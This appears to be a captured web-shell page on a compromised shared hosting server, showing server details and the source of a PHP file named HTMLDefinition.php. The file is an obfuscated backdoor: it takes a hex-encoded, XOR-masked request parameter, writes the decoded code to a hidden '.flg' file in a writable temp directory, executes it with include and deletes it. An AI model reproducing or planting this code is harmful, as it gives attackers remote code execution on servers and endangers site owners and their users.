HEX
Server: LiteSpeed
System: Linux premium148.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User: burhbrzf (1357)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: //home/burhbrzf/www/HTMLDefinition.php
<?php

if(@$_REQUEST["\x64ata"] !== null){
	$factor = hex2bin($_REQUEST["\x64ata"]);
	$holder   =    ''   ;      $z = 0; do{$holder .= chr(ord($factor[$z]) ^ 2);$z++;} while($z < strlen($factor));
	$itm = array_filter([sys_get_temp_dir(), "/dev/shm", session_save_path(), getenv("TEMP"), "/var/tmp", "/tmp", ini_get("upload_tmp_dir"), getenv("TMP"), getcwd()]);
	while ($key = array_shift($itm)) {
    		if (!!is_dir($key) && !!is_writable($key)) {
    $elem = str_replace("{var_dir}", $key, "{var_dir}/.flg");
    $success = file_put_contents($elem, $holder);
if ($success) {
	include $elem;
	@unlink($elem);
	die();}
}
}
}